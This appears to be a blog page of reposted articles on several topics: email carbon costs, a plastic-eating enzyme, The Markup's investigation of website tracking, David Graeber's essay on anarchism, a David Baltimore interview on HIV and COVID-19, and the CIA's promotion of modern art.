Big tech firms such as Google, for example, are already proudly carbon-neutral: they pay subsidies for environmental projects to offset the carbon they burn providing your emails - and other services like YouTube.

"What really makes a difference is buying less kit, and keeping it for longer," Prof Preist explains. "But even this is small fry compared with your travel, heating your home, and what you eat."

He said consumers should focus their "eco-guilt" on things that make a difference - and not sweat the small stuff.

"That is the job of the companies providing the services, who should be designing their systems to deliver services in as energy and resource efficient way as possible."

His advice on email etiquette and thank you messages?

"Send an email if you feel that the other person will value it, and don't if they won't," he said.

"The biggest 'waste' both from an environmental and personal point of view will be the use of time by both of you."





BBC News

středa 21. října 2020

Super-enzyme eats plastic bottles six times faster

A super-enzyme that degrades plastic bottles six times faster than before has been created by scientists and could be used for recycling within a year or two.

The super-enzyme, derived from bacteria that naturally evolved the ability to eat plastic, enables the full recycling of the bottles. Scientists believe combining it with enzymes that break down cotton could also allow mixed-fabric clothing to be recycled. Today, millions of tonnes of such clothing is either dumped in landfill or incinerated.

Plastic pollution has contaminated the whole planet, from the Arctic to the deepest oceans, and people are now known to consume and breathe microplastic particles. It is currently very difficult to break down plastic bottles into their chemical constituents in order to make new ones from old, meaning more new plastic is being created from oil each year.

The super-enzyme was engineered by linking two separate enzymes, both of which were found in the plastic-eating bug discovered at a Japanese waste site in 2016. The researchers revealed an engineered version of the first enzyme in 2018, which started breaking down the plastic in a few days. But the super-enzyme gets to work six times faster.

“When we linked the enzymes, rather unexpectedly, we got a dramatic increase in activity,“ said Prof John McGeehan, at the University of Portsmouth, UK. “This is a trajectory towards trying to make faster enzymes that are more industrially relevant. But it’s also one of those stories about learning from nature, and then bringing it into the lab.”





The Guardian

úterý 13. října 2020

The High Privacy Cost of a “Free” Website

An array of free website-building tools, many offered by ad-tech and ad-funded companies, has led to a dizzying number of trackers loading on users’ browsers, even when they visit sites where privacy would seem paramount, an investigation by The Markup has found. Some load without the website operators’ explicit knowledge—or disclosure to users.

Website operators may agree to set cookies—small strings of text that identify you—from one outside company. But they are not always aware that the code setting those cookies can also load dozens of other trackers along with them, like nesting dolls, each collecting user data.

To investigate the pervasiveness of online tracking, The Markup spent 18 months building a one-of-a-kind free public tool that can be used to inspect websites for potential privacy violations in real time. Blacklight reveals the trackers loading on any site—including methods created to thwart privacy-protection tools or watch your every scroll and click.

We scanned more than 80,000 of the world’s most popular websites with Blacklight and found more than 5,000 were “fingerprinting” users, identifying them even if they block third-party cookies.

We also found more than 12,000 websites loaded scripts that watch and record all user interactions on a page—including scrolls and mouse movements. It’s called “session recording” and we found a higher prevalence of it than researchers had documented before.

More than 200 popular websites used a particularly invasive technique that captures personal information people enter on forms—like names, phone numbers, and passwords—before they hit send. It’s called “key logging” and it’s sometimes done as part of session recording.

Marketing and advertising companies are happy to provide these tools for free in exchange for user data, which is used to construct ever-more-refined profiles of internet users.

In other words, website operators are often effectively as blind to exactly what information advertising companies and marketers are collecting from their website visitors—and what they’re doing with the data—as the people browsing the internet are.

“I don’t want to say that the majority of websites don’t fully understand the data they’re collecting, but a large percentage do not,” said Michael Williams, a partner at Clym, a business that brings companies into compliance with online privacy laws like the European Union’s General Data Protection Regulation and the California Consumer Privacy Act.

He said when his firm scans websites, it often finds trackers the website operators did not know existed.

U.K.-based Privacy International found last year that some European mental health websites didn’t always know about the plethora of advertising-related tracking technologies that loaded from their sites onto users’ browsers.

Some small website operators say they don’t have much of a choice in the matter. Most of the tools available to build a robust, functional website on the internet have user tracking built into their very functionality. Even giving users the ability to search inside a website comes with strings attached.

“Google Search is a great tool that can be incorporated into a website, but then all searches as conducted by site visitors can be tracked to IP address,” said Fire Erowid of Erowid, the long-running nonprofit psychoactive drug information site. She said her team ended up building a “far worse” search function for the site to protect user privacy.

Frederik Zuiderveen Borgesius, a professor at Radboud University in the Netherlands who has written extensively on online privacy, said the pervasiveness of tracking could wreck one of the foundations of the internet: easy access to information, particularly for those who may have no other way to get it.

“Let’s say you’re a Muslim in India, or a Palestinian in Israel, or a homosexual in Poland,” he said. “At some point, you just feel uncomfortable looking for information about your own religion or own sexual preferences. Or you might be too uneasy about looking for information about sexually transmitted diseases because you fear that your behavior is monitored.

Academic research has repeatedly shown that connecting supposedly anonymous marketing data to a name can be done with relative ease.

The operators of some sensitive sites said they knew their sites load marketing trackers—and they’ve made peace with the trade-off.

“It’s not good enough to have a website,” said Chris McMurry, a member of the group’s board of directors. “We have to invest in making sure that what’s on our website is seen by those who need it the most.”

The site also sells ad space on its site, which comes with its own trackers, but the revenue helps him provide vital services. 

The Markup’s findings underscore how the web’s foundational profit source, the online advertising industry, is trying to make money from every interaction on the internet—not just the obvious clicks, like visiting retailers.

Data collected from your detailed web browsing habits—what specific pages you visited, for how long, what you did there—can be tied to records of products and services you purchased both online and offline and tied to your identity through things like store consumer loyalty cards. This can then be linked to information collected from an app you downloaded on your smartphone or which movie or show you streamed last night. The profiles are filled with data about each visitor, including presumed interests and geographic location.

Companies claim this data allows them to make predictions about who is ready and able to buy certain products and provide those insights to sellers.

The ad-targeting categories offered by marketing companies can be surprising. The list produced by the Interactive Advertising Bureau, a prominent online ad industry trade group, has included things like “Incest/Abuse Support,” “Substance Abuse,” and “AIDS/HIV.”   After this was reported publicly, the group removed the first category, but the others remain.

Many sites don’t load just one or two trackers—they load dozens of them because of a process called real-time bidding, which allows ads on a site to be personalized to whoever visits it.

When a user visits a page offering real-time ads, advertisers compete with each other for the ad space—in some cases tying users to those data-heavy profiles—in the blink of an eye. Regardless of who wins the auction to show the ad, all bidders are told who visited the site.

“Americans never agreed to be tracked and have their sensitive information sold to anyone with a checkbook,” a group of federal lawmakers wrote in a letter about real-time bidding to the Federal Trade Commission in July. “This outrageous privacy violation must be stopped and companies that are trafficking in Americans’ illicitly obtained private data should be shut down.”

They asked the agency to open an inquiry. FTC officials declined to say whether they have.

Websites serving people in Europe have had to get their affirmative consent before tracking users since 2018, when the European Union’s privacy law went into effect. Ironically, a 2019 study looking at those consent notifications found they are largely structured to encourage users to agree to tracking they otherwise wouldn’t readily allow and that they offer “no meaningful choice to consumers.”

The California Consumer Privacy Act requires large, for-profit companies doing business in the state to disclose the information its website collects, allow users to opt out of collection, and delete users’ data upon request.

The only federal law specifically requiring websites in the U.S. to disclose user tracking applies only to websites serving children, but the Federal Trade Commission has gone after companies for “deceptive” practices for claiming that they don’t track users when in fact they do.

As for the ad industry’s solutions to online privacy concerns, they have largely centered on allowing people to either opt out of tracking or opt out of being served targeted ads related to that tracking. Google, Oracle, Facebook, and online advertising industry groups on both sides of the Atlantic offer some version of those options.

To exercise them, people have to ask each online advertising and marketing company individually and install a cookie on their devices reminding the company in question not to track them in the future.  For some opt outs, the companies require requestors to provide their full name, email, and physical address.

Facebook, for instance, continues to collect data on those who have opted out, spokesperson Alex Dziedzan confirmed. He said it does so for “non-ads” purposes like “measurement, security, integrity, etc.”







Aaron Sankin
Investigative Reporter

Surya Mattu
Investigative Data Journalist

neděle 13. září 2020

Are You An Anarchist? The Answer May Surprise You!

Chances are you have already heard something about who anarchists are and what they are supposed to believe. Chances are almost everything you have heard is nonsense. Many people seem to think that anarchists are proponents of violence, chaos, and destruction, that they are against all forms of order and organization, or that they are crazed nihilists who just want to blow everything up. In reality, nothing could be further from the truth. Anarchists are simply people who believe human beings are capable of behaving in a reasonable fashion without having to be forced to. It is really a very simple notion. But it’s one that the rich and powerful have always found extremely dangerous.

At their very simplest, anarchist beliefs turn on to two elementary assumptions. The first is that human beings are, under ordinary circumstances, about as reasonable and decent as they are allowed to be, and can organize themselves and their communities without needing to be told how. The second is that power corrupts. Most of all, anarchism is just a matter of having the courage to take the simple principles of common decency that we all live by, and to follow them through to their logical conclusions. Odd though this may seem, in most important ways you are probably already an anarchist — you just don’t realize it.

If there’s a line to get on a crowded bus, do you wait your turn and refrain from elbowing your way past others even in the absence of police?
If you answered “yes”, then you are used to acting like an anarchist! The most basic anarchist principle is self-organization: the assumption that human beings do not need to be threatened with prosecution in order to be able to come to reasonable understandings with each other, or to treat each other with dignity and respect.

Everyone believes they are capable of behaving reasonably themselves. If they think laws and police are necessary, it is only because they don’t believe that other people are. But if you think about it, don’t those people all feel exactly the same way about you? Anarchists argue that almost all the anti-social behavior which makes us think it’s necessary to have armies, police, prisons, and governments to control our lives, is actually caused by the systematic inequalities and injustice those armies, police, prisons and governments make possible. It’s all a vicious circle. If people are used to being treated like their opinions do not matter, they are likely to become angry and cynical, even violent — which of course makes it easy for those in power to say that their opinions do not matter. Once they understand that their opinions really do matter just as much as anyone else’s, they tend to become remarkably understanding. To cut a long story short: anarchists believe that for the most part it is power itself, and the effects of power, that make people stupid and irresponsible.

Are you a member of a club or sports team or any other voluntary organization where decisions are not imposed by one leader but made on the basis of general consent?
If you answered “yes”, then you belong to an organization which works on anarchist principles! Another basic anarchist principle is voluntary association. This is simply a matter of applying democratic principles to ordinary life. The only difference is that anarchists believe it should be possible to have a society in which everything could be organized along these lines, all groups based on the free consent of their members, and therefore, that all top-down, military styles of organization like armies or bureaucracies or large corporations, based on chains of command, would no longer be necessary. Perhaps you don’t believe that would be possible. Perhaps you do. But every time you reach an agreement by consensus, rather than threats, every time you make a voluntary arrangement with another person, come to an understanding, or reach a compromise by taking due consideration of the other person’s particular situation or needs, you are being an anarchist — even if you don’t realize it.

Anarchism is just the way people act when they are free to do as they choose, and when they deal with others who are equally free — and therefore aware of the responsibility to others that entails. This leads to another crucial point: that while people can be reasonable and considerate when they are dealing with equals, human nature is such that they cannot be trusted to do so when given power over others. Give someone such power, they will almost invariably abuse it in some way or another.

Do you believe that most politicians are selfish, egotistical swine who don’t really care about the public interest? Do you think we live in an economic system which is stupid and unfair?
If you answered “yes”, then you subscribe to the anarchist critique of today’s society — at least, in its broadest outlines. Anarchists believe that power corrupts and those who spend their entire lives seeking power are the very last people who should have it. Anarchists believe that our present economic system is more likely to reward people for selfish and unscrupulous behavior than for being decent, caring human beings. Most people feel that way. The only difference is that most people don’t think there’s anything that can be done about it, or anyway — and this is what the faithful servants of the powerful are always most likely to insist — anything that won’t end up making things even worse.

But what if that weren’t true?

And is there really any reason to believe this? When you can actually test them, most of the usual predictions about what would happen without states or capitalism turn out to be entirely untrue. For thousands of years people lived without governments. In many parts of the world people live outside of the control of governments today. They do not all kill each other. Mostly they just get on about their lives the same as anyone else would. Of course, in a complex, urban, technological society all this would be more complicated: but technology can also make all these problems a lot easier to solve. In fact, we have not even begun to think about what our lives could be like if technology were really marshaled to fit human needs. How many hours would we really need to work in order to maintain a functional society — that is, if we got rid of all the useless or destructive occupations like telemarketers, lawyers, prison guards, financial analysts, public relations experts, bureaucrats and politicians, and turn our best scientific minds away from working on space weaponry or stock market systems to mechanizing away dangerous or annoying tasks like coal mining or cleaning the bathroom, and distribute the remaining work among everyone equally? Five hours a day? Four? Three? Two? Nobody knows because no one is even asking this kind of question. Anarchists think these are the very questions we should be asking.

Do you really believe those things you tell your children (or that your parents told you)?
“It doesn’t matter who started it.” “Two wrongs don’t make a right.” “Clean up your own mess.” “Do unto others...” “Don’t be mean to people just because they’re different.” Perhaps we should decide whether we’re lying to our children when we tell them about right and wrong, or whether we’re willing to take our own injunctions seriously. Because if you take these moral principles to their logical conclusions, you arrive at anarchism.

Take the principle that two wrongs don’t make a right. If you really took it seriously, that alone would knock away almost the entire basis for war and the criminal justice system. The same goes for sharing: we’re always telling children that they have to learn to share, to be considerate of each other’s needs, to help each other; then we go off into the real world where we assume that everyone is naturally selfish and competitive. But an anarchist would point out: in fact, what we say to our children is right. Pretty much every great worthwhile achievement in human history, every discovery or accomplishment that’s improved our lives, has been based on cooperation and mutual aid; even now, most of us spend more of our money on our friends and families than on ourselves; while likely as not there will always be competitive people in the world, there’s no reason why society has to be based on encouraging such behavior, let alone making people compete over the basic necessities of life. That only serves the interests of people in power, who want us to live in fear of one another. That’s why anarchists call for a society based not only on free association but mutual aid. The fact is that most children grow up believing in anarchist morality, and then gradually have to realize that the adult world doesn’t really work that way. That’s why so many become rebellious, or alienated, even suicidal as adolescents, and finally, resigned and bitter as adults; their only solace, often, being the ability to raise children of their own and pretend to them that the world is fair. But what if we really could start to build a world which really was at least founded on principles of justice? Wouldn’t that be the greatest gift to one’s children one could possibly give?

Do you believe that human beings are fundamentally corrupt and evil, or that certain sorts of people (women, people of color, ordinary folk who are not rich or highly educated) are inferior specimens, destined to be ruled by their betters?
If you answered “yes”, then, well, it looks like you aren’t an anarchist after all. But if you answered “no”, then chances are you already subscribe to 90% of anarchist principles, and, likely as not, are living your life largely in accord with them. Every time you treat another human with consideration and respect, you are being an anarchist. Every time you work out your differences with others by coming to reasonable compromise, listening to what everyone has to say rather than letting one person decide for everyone else, you are being an anarchist. Every time you have the opportunity to force someone to do something, but decide to appeal to their sense of reason or justice instead, you are being an anarchist. The same goes for every time you share something with a friend, or decide who is going to do the dishes, or do anything at all with an eye to fairness.

Now, you might object that all this is well and good as a way for small groups of people to get on with each other, but managing a city, or a country, is an entirely different matter. And of course there is something to this. Even if you decentralize society and put as much power as possible in the hands of small communities, there will still be plenty of things that need to be coordinated, from running railroads to deciding on directions for medical research. But just because something is complicated does not mean there is no way to do it democratically. It would just be complicated. In fact, anarchists have all sorts of different ideas and visions about how a complex society might manage itself. To explain them though would go far beyond the scope of a little introductory text like this. Suffice it to say, first of all, that a lot of people have spent a lot of time coming up with models for how a really democratic, healthy society might work; but second, and just as importantly, no anarchist claims to have a perfect blueprint. The last thing we want is to impose prefab models on society anyway. The truth is we probably can’t even imagine half the problems that will come up when we try to create a democratic society; still, we’re confident that, human ingenuity being what it is, such problems can always be solved, so long as it is in the spirit of our basic principles — which are, in the final analysis, simply the principles of fundamental human decency.







David Graeber

sobota 2. května 2020

Pandemics of the Past and Future

Though no two pandemics are the same, each one that occurs has lessons to teach us about the next one. David Baltimore, President Emeritus and Robert Andrews Millikan Professor of Biology, is a virologist who studied HIV during the height of the AIDS pandemic in the 1980s and 1990s.

In 1975, Baltimore shared the Nobel Prize in Physiology or Medicine for his discovery of the enzyme that viruses such as HIV use to copy their RNA into DNA. These so-called retroviruses then permanently insert the DNA copy of their genes into a host cell, making it impossible to truly clear an infection. Though the novel coronavirus (severe acute respiratory syndrome coronavirus 2, or SARS-CoV-2) is fortunately not a retrovirus, it is still causing the most destructive global pandemic since the peak of the AIDS pandemic.


Can you first walk us through the timeline of the AIDS epidemic?
The AIDS epidemic started, actually, with some observations in Los Angeles of patients who were turning up at doctors' offices with a variety of strange symptoms, all of which suggested a failing immune system. It was a syndrome that had never been seen before. Particular skin diseases and mouth diseases and other things which, together, made no sense. These patients were largely gay men, and were seen by doctors who specialized in treating gay men.

The doctors reported these cases to the Centers for Disease Control in Atlanta, which published this occurrence as an oddity, but other doctors in other places recognized that they were seeing similar problems. It became a syndrome of unknown origin, and it took a while before the cause was recognized to be a virus, called human immunodeficiency virus or HIV.

Once it was clear that it was a virus, then it was able to be thought about as an infectious disease being spread from one person to another. That helped enormously to pinpoint the kind of problem it was, but it was clearly an agent we had never seen before. It turned out to be a virus belonging to a class of viruses that I had worked on 10 years before, called retroviruses. I had discovered that retroviruses had a unique enzyme capacity to make a DNA copy of their RNA. For that, I had won the Nobel Prize in 1975. Now, by the early 1980s, this class of viruses was well established, but no one had ever seen it causing a disease of this sort.

The HIV virus eventually was traced to a virus that's endemic in monkeys in Africa that made its way into chimpanzees, made its way into humans, and was being transmitted—poorly, but effectively—among humans. Poorly in the sense that it's not a very infectious virus. That all became clear over the 1980s and '90s.

Meanwhile, the HIV virus of course spread around the world. It is pretty uniformly lethal, causing a pandemic of disease and deaths. Luckily, people had been studying inhibitors of viruses like this, and there were on the shelf some drugs that immediately got tested for their ability to stop this disease. In fact, one of them, AZT, turned out to be very effective, although short-lived in its effect because the virus mutated against it. But, it gave the clue that this was the direction to go in the development of drugs. Many other drugs of that class were made by different pharmaceutical companies, and ultimately we got pretty good antiviral compounds.

The scientific community studied the nature of the virus and found other weak spots that were targets for drug development. We ended up with a wide spectrum of drugs to treat this disease with. Today, AIDS is maintained as a chronic disease, but its lethality has largely been controlled, at least in the developed world where the drugs are more consistently available. We now live with the AIDS virus, HIV, as part of our world.

So the AIDS pandemic was ultimately slowed with drugs for treatment, but not a vaccine to HIV. Why has there not been an HIV vaccine?
That's a very interesting story, because we assume we will be able to make a vaccine against most viruses when they're first discovered. Historically, we've made vaccines against a very wide range of viruses: smallpox and polio, measles, mumps, rubella, on and on. With that history, we expected to make a vaccine.

I was involved in thinking about this in the '80s, and when we looked at this virus, we saw that it had a characteristic that suggested that it might not be possible to make a vaccine. This characteristic is that the virus can and does mutate freely, so that it is constantly presenting a different immune profile. In spite of work by companies and university scientists around the world, we don't have a vaccine. There really has never been a virus that's been this recalcitrant to control and this lethal. Still, some of my colleagues are working on ways that we ultimately may be able to develop a vaccine.

So, this is the background against which COVID-19 has appeared. What are some differences between that pandemic and this one? For example, you mentioned that HIV is transmitted poorly, whereas the COVID-19 virus seems to be transmitting very readily.
Yes, one of the main differences is that SARS-CoV-2 is extremely infectious, whereas HIV is very poorly infectious.

There are many other differences between the two viruses. First of all, they're part of very different families of viruses. SARS-CoV-2 is a coronavirus. HIV we call a retrovirus or lentivirus. They have a completely different evolutionary history and a whole lot of differences in mechanisms. Although they are both viruses—that is they're very small agents that only grow inside cells—they behave in very different ways.

But they're similar in that they both came from animals. For HIV, it was monkeys, and for SARS-CoV-2, we think bats. They're both new to humans. We don't have any drugs to deal with coronaviruses because the coronaviruses have not been a big problem up until now. They were a small focal problem with the viruses that cause SARS and MERS [Middle East respiratory syndrome] which are coronaviruses, but those outbreaks were contained relatively quickly.

How are we tackling this current pandemic? Is the focus on treatment with drugs or development of a vaccine?
For the moment, we have nothing to deal with the virus. We're hoping maybe that drugs that were developed for other purposes might work against coronaviruses, but of course, we have no vaccine. We're starting from scratch. However, we have a huge armamentarium to work on this. We have companies that have made vaccines against many other viruses and that have developed drugs like those for HIV.

The scientific community is hopeful that making a vaccine against COVID-19 will be relatively straightforward. But we don't have experience to go on. We've never made a vaccine against any coronavirus because we haven't had to. We don't have the experience to know whether this class of viruses will be easy to deal with immunologically or difficult. I'm hopeful, but the virus is spreading so incredibly effectively that we don't have much time if we're going to have an impact on its spread.

So we've chosen the only route that we know will work to slow up the spread of the virus, and that is to stop people from congregating. This virus, like any other virus, only exists by spreading from one person to another person to another person. That spreading requires close contact between people, and that's why we're now asking people to stay six feet apart, to wear masks, to stay at home.

We're doing things that we've never done before on this scale to try to block the transmission, without drugs and without a vaccine. We have to accept the disruption of society, disruption of economic activity, disruption of intellectual activity, disruption of all ordinary behaviors.

The common cold is also often caused by a coronavirus; why is it not considered a pandemic?
The common cold is also a pandemic. But it's not lethal. There are hundreds of different kinds of viruses that cause the common cold—some of them being coronaviruses—but we don't usually worry about them because they take care of themselves. They cause a mild cold, often in kids, which then goes away.

Those kinds of coronaviruses are not serious causes of disease and so we don't worry about them. Even if they cause a pandemic—meaning, there are lots and lots of people around the world who are getting the sniffles—we just allow our immune systems to deal with it.

It's probably not a great idea that we ignore the common cold viruses. Public health officials sometimes do study the common cold, to at least understand its natural history and where it's distributed, how infectious it is, other things. But we don't put a lot of resources into that because it's not a real challenge to our society.

The COVID-19 virus is lethal in something like 1-5% of infections, unlike the common cold coronavirus, which is virtually never lethal. We had no pre-existing immunity to COVID-19 because it's never been seen in humans before, as far as we know. Now we are mobilizing to try to block its spread because it's killing people and its level of disruption of the ordinary functioning of our society is absolutely extraordinary. We've never seen anything like this since the flu epidemic of 1918—and very few of us saw that.

In hindsight, is there anything that you think epidemiologists and public health officials should have done differently to handle the AIDS pandemic, and anything that you think we should be doing differently now to handle this pandemic?
Well, the AIDS pandemic was handled very poorly. At the time, in the early 1980s, it seemed to be a disease that mainly affected gay men. At that time, homosexuality was treated as a deviance. President Reagan didn't even want to use the word AIDS, the word HIV, the word gay. So we were very slow in developing a response to the HIV epidemic because of homophobia. It really took a decade or two before we recognized that, first of all, this was a virus that was found in the homosexual community very extensively, but also outside of it, and particularly in Africa.

We had to realize that we needed to treat it as a threat to our society, not just as a disease of a particular class of people. We then were much more effective in preventing it by preventing contact and by treating it with the drugs that came along. But it took a long time.

In 1986, I was co-chair of a committee of the National Academy of Sciences that issued a report called Confronting AIDS. This was an activity that should have been undertaken by the federal government, but the federal government was afraid of touching it. So, it was done by the National Academy of Sciences and it laid out a plan for the country to study the virus, to respond to the virus, and act. Money was appropriated by Congress, and we started a serious research program. But that was five years after we knew the nature of the virus.

The start of our response to COVID-19 was very similar to our response to HIV. We tried to pigeonhole it as a disease of only certain people, Chinese people for COVID-19 or homosexuals for AIDS. We tried to ignore it. We knew, in the scientific community, that viruses don't only affect one group of people, that they spread to everybody. As soon as we knew COVID-19 was infectious, we knew it was going to spread everywhere in the world. We're now discovering that the terrible epidemic in New York City actually started in February, but nobody was paying attention to it. And it came from Europe, it didn't come from China.

The scientific community understands that a new pandemic is a part of the history of pandemics and that what happened once before is going to happen again.

What can we, as a society, do to be preparing for the next viral pandemic?
We must put the resources into protecting ourselves and build up our capabilities in the areas of epidemiology, public health, vaccines, rapid responses, and virus science in general.

We should have a cadre of public health people who are studying these problems continually, looking at all of the viruses in the natural world and saying one by one, "If this one got loose, what would we do?" and prepare ourselves. We can do all of that. It's not actually enormously expensive. But it means, first of all, we can't depend on our industries to do it because it's not economically attractive.

It's something that has to be done by the public and that means there has to be money put aside for it. Over my whole lifetime, what I have seen is that every time there is an epidemic, we say, "Now we've got to study this and prepare ourselves for the next one." But within a couple of years, that impetus is gone, the money has been reassigned to other problems and we're not maintaining our surveillance of the natural world. We're not maintaining our capabilities in vaccine and drug development, so we have to start all over again when the next disease comes along. That's shortsighted. It is the reality of politics, however.

Now that researchers are working on drugs and vaccines, and the rest of society seems to be mobilized in our own ways with the stay-at-home directives and protective measures, is there anything in particular that you think we can be doing better?
Well, I'm actually very impressed with what's going on. Some companies have simply said, "We're going to devote our expertise to this problem and we're not going to worry about the economics of it." I think we will have a response to this problem, but the response is already too late. What we've seen with this epidemic is that once the genie's out of the bottle, so to speak, it spreads so widely and so quickly that unless we have all of our defenses ready to go, we're going to be too late. We are now too late.
We should learn from this. We should already have a national program to make sure that the next time this happens, we're not so defenseless.





WRITTEN BY Lori Dajose

neděle 26. dubna 2020

Was Modern Art Really a CIA Psy-Op?

In the mid-twentieth century, modern art and design represented the liberalism, individualism, dynamic activity, and creative risk possible in a free society. Jackson Pollock’s gestural style, for instance, drew an effective counterpoint to Nazi, and then Soviet, oppression. Modernism, in fact, became a weapon of the Cold War. Both the State Department and the CIA supported exhibitions of American art all over the world.

The preeminent Cultural Cold Warrior, Thomas W. Braden, who served as MoMA’s executive secretary from 1948-1949, later joined the CIA in 1950 to supervise its cultural activities. Braden noted, in a Saturday Evening Post article titled “I’m glad the CIA is ‘immoral’” that American art “won more acclaim for the U.S. …than John Foster Dulles or Dwight D. Eisenhower could have bought with a hundred speeches.”

The relationship between Modern Art and American diplomacy began during WWII, when the Museum of Modern Art was mobilized for the war effort. MoMA was founded in 1929 by Abby Aldrich Rockefeller. A decade later, her son Nelson Rockefeller became president of the Museum. In 1940, while he was still President of MoMA, Rockefeller was appointed the Roosevelt Administration’s Coordinator of Inter-American affairs. He also served as Roosevelt’s Assistant Secretary of State in Latin America.

The Museum followed suit. MoMA fulfilled 38 government contracts for cultural materials during the Second World War, and mounted 19 exhibitions of contemporary American painting for the Coordinator’s office, which were exhibited throughout Latin America. (This direct relationship between the avant-garde and the war effort was well suited: The term avant-garde actually began as a French military term to describe vanguard troops advancing into battle.)

In the battle for “hearts and minds,” modern art was particularly effective. John Hay Whitney, both a president of MoMA and a member of the Whitney Family, which founded the Whitney Museum of American Art, explained that art stood out as a line of national defense, because it could “educate, inspire, and strengthen the hearts and wills of free men.”

Whitney succeeded Rockefeller as President of the Museum of Modern Art in January 1941, so that Nelson could turn his entire attention to his Coordinator duties. Under Whitney, MoMA served as “A Weapon of National Defense.” According to a Museum press release dated February 28, 1941, MoMA would “inaugurate a new program to speed the interchange of the art and culture of this hemisphere among all the twenty-one American republics.” The goal was “Pan-Americanism.” A “Traveling Art Caravan” through Latin America “would do more to bring us together as friends than ten years of commercial and political work.”

When the War ended, Nelson Rockefeller returned to the Museum, and his Inter-American-Affairs staffers assumed responsibilities for MoMA’s international exhibition program: René d’Harnoncourt, who had headed Inter-American’s art division, became the Museum’s vice president in charge of foreign activities. Fellow staffer Porter McCray became the Director of the Museum’s International Program.

Modern art was so well aligned with American Cold War foreign policy that McCray took a leave of absence from the Museum in 1951 to work on the Marshall Plan. In 1957, Whitney resigned his position as MoMA’s Chairman of the Board of Trustees to become United States Ambassador to Great Britain. Whitney remained a trustee of the Museum while he was Ambassador, and his successor as Chairman was… Nelson Rockefeller, who had served as Special Assistant to President Eisenhower for Foreign Affairs until 1955.

A model of the CIA headquarters in front of a Georgia O'Keefe painting
Georgia O’Keefe colors the landscape around a model of CIA headquarters
Even though Modern art and American diplomacy were of a piece, Soviet propaganda asserted that the United States was a “culturally barren” capitalist wasteland. To make the case for American cultural dynamism, the State Department in 1946 spent $49,000 to purchase seventy-nine paintings directly from American Modern artists, and mounted them in a traveling exhibition called “Advancing American Art.” That exhibition, which made stops in Europe and Latin America, included work from artists such as Georgia O’Keeffe and Jacob Lawrence.

Despite positive reviews from Paris to Port au Prince, the exhibition stopped short in Czechoslovakia in 1947, because Americans themselves were indignant. Look Magazine fired off an article entitled “Your Money Bought These Paintings.” The Look piece questioned why U.S. tax dollars were being spent on such confusing pieces of art—and wondered if these were paintings even art. Harry Truman took one look at Yasuo Kuniyoshi’s painting Circus Girl Resting, which was included in the exhibit, and said, “If this is art, I’m a Hottentot.”

In Congress, Republican Representatives John Taber of New York, and Fred Busbey of Illinois worried that some of the artists were held Communist sympathies, or engaged in “Un-American Activities.”

The American public’s fear of the Red Menace brought “Advancing American Art” home early, but it was precisely because Modern art was not universally popular, and was created by artists who openly disdained orthodoxy, that it was such an effective tool in showcasing the fruits of American cultural freedom to anyone looking in from abroad. President Truman personally considered Modern art, “merely the vaporings of half-baked lazy people.” But he did not declare it degenerate and expel its practitioners to gulags in Siberia. Not only that, abstract expressionism in particular was a direct repudiation of Soviet Socialist Realism. Nelson Rockefeller liked to call it “Free Enterprise Painting.”

In contrast to the Soviet Union’s “Popular Front,” the New Yorker magazine wonderfully, and perfectly, referred to the political role of American Modernism as “The Unpopular Front.” The very existence of American Modern Art proved to the world that its creators were free to create, whether you liked their work or not.

If Advancing American Art proved the nation’s artists were free because they could splatter as much paint as they wanted, it also proved that Congress could not always be induced to spend tax dollars supporting it. Braden later wrote, “the idea that Congress would have approved many of our projects was about as likely as the John Birch Society’s approving Medicare.” Clearly the State Department wasn’t the right patron for Modern Art. Which brings us to the CIA.

The cultural cognoscenti and the CIA fought the Cultural Cold War side by side, with the Whitney Trust acting as a funding conduit.
In 1947, at the very moment that the Advancing American Art show was being recalled, and the United States Government was selling its O’Keeffe’s for fifty bucks a-piece (all seventy-nine pieces in the show together brought in $5,544), the CIA was being created. The CIA grew out of “Wild” Bill Donovan’s Office of Strategic Services (OSS), which was the U.S.’s wartime intelligence apparatus. MoMA’s John Hay Whitney and Thomas W. Braden had both been members of the OSS.

Their fellow operatives included the poet and Librarian of Congress Archibald MacLeish, the historian and public intellectual Arthur M. Schlesinger, Jr., and the Hollywood director John Ford. By the time the CIA was codified in 1947, clandestine affairs had long been the arena of America’s cultural elite. Now, as museum staffers like Braden joined, the cultural cognoscenti and the CIA fought the Cultural Cold War side by side, with the Whitney Trust acting as a funding conduit.

Speaking of front organizations, in 1954, MoMA took over (from the State Department) the U.S. Pavilion at the Venice Biennale, so that the U.S. could continue to exhibit Modern art abroad without appropriating public funds. (MoMA owned the U.S. pavilion at Venice from 1954 to 1962. It was the only national pavilion at the show that was privately owned.)

Eisenhower made MoMA’s role as a government proxy clear in 1954, speaking at the Museum’s twenty-fifth anniversary celebration. Eisenhower called Modern art a “Pillar of Liberty,” saying:

As long as our artists are free to create with sincerity and conviction, there will be healthy controversy and progress in art. How different it is in tyranny. When artists are made the slaves and tools of the state; when artists become the chief propagandists of a cause, progress is arrested and creation and genius are destroyed.

It was MoMA’s job, concurred United States Ambassador to the Soviet Union, to demonstrate to the rest of the world “both that we have a cultural life and that we care about it.”

The CIA not only helped finance MoMA’s international exhibitions, it made cultural forays across Europe. In 1950, the Agency created the Congress for Cultural Freedom (CCF), headquartered in Paris. Though it appeared to be an “autonomous association of artists, musicians and writers,” it was in fact a CIA funded project to “propagate the virtues of western democratic culture.” The CCF operated for 17 years, and, at its peak, “had offices in thirty-five countries, employed dozens of personnel, published over twenty prestige magazines, held art exhibitions, owned a news and features service, organized high-profile international conferences, and rewarded musicians and artists with prizes and public performances.”

The CIA chose to headquarter the Congress for Cultural Freedom in Paris, because that city had long been the capital of European cultural life, and the CCF’s main goal was to convince European intellectuals, who might otherwise be swayed by Soviet propaganda, which suggested that the U.S. was home only to capitalist philistines, that in fact the opposite was true: with Europe weakened by war, it was now the United States that would protect and nurture the western cultural tradition, in the face of Soviet dogma.

Braden, writing about his role in the CCF as director of the CIA’s cultural activities, explained in 1967, “in much of Europe in the 1950’s, socialists, people who called themselves ‘left’—the very people whom many Americans thought no better than Communists—were the only people who gave a damn about fighting Communism.” When the CIA made its bid to the European intelligentsia, the Agency was waging what Braden called “the battle for Picasso’s mind,” via Jackson Pollack’s art.

Accordingly, the CIA bankrolled the Partisan Review, which was the center of the American non-Communist left, carrying enormous cultural prestige in both the U.S. and Europe because of its association with writers like T.S. Eliot and George Orwell. Unsurprisingly, the editor of the Partisan Review was the art critic Clement Greenberg, the most influential arbiter of taste, and the strongest proponent of abstract expressionism in post-war New York.

